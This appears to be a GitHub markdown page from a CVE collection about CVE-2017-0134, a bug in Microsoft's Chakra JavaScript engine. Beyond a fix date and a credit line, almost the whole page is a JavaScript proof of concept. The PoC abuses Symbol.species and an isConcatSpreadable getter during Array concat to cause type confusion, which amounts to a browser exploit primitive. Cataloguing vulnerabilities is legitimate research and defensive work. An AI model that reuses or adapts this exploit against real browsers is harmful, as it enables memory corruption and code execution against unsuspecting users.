Skip to content

Latest commit

 

History

History
35 lines (29 loc) · 898 Bytes

CVE-2017-0134.md

File metadata and controls

35 lines (29 loc) · 898 Bytes
Raw

CVE-2017-0134

  • Fix: Mar 2017
  • Credit: Jordan Rabet, Microsoft Offensive Security Research Team

PoC

PoC from eboda

var a1 = [];
for (var i = 0; i < 0x100; i++) {
    a1[i] = i;
}
var a2 = [lower(addr), upper(addr)];
var c = new Function();
c[Symbol.species] = function() {
    new_array = [];
    return new_array;
};
a1.constructor = c;
a2.__defineGetter__(Symbol.isConcatSpreadable, function () {
    new_array[0] = {};
    return true;
});
var res = a1.concat(a2);
res[0x100/2];

Reference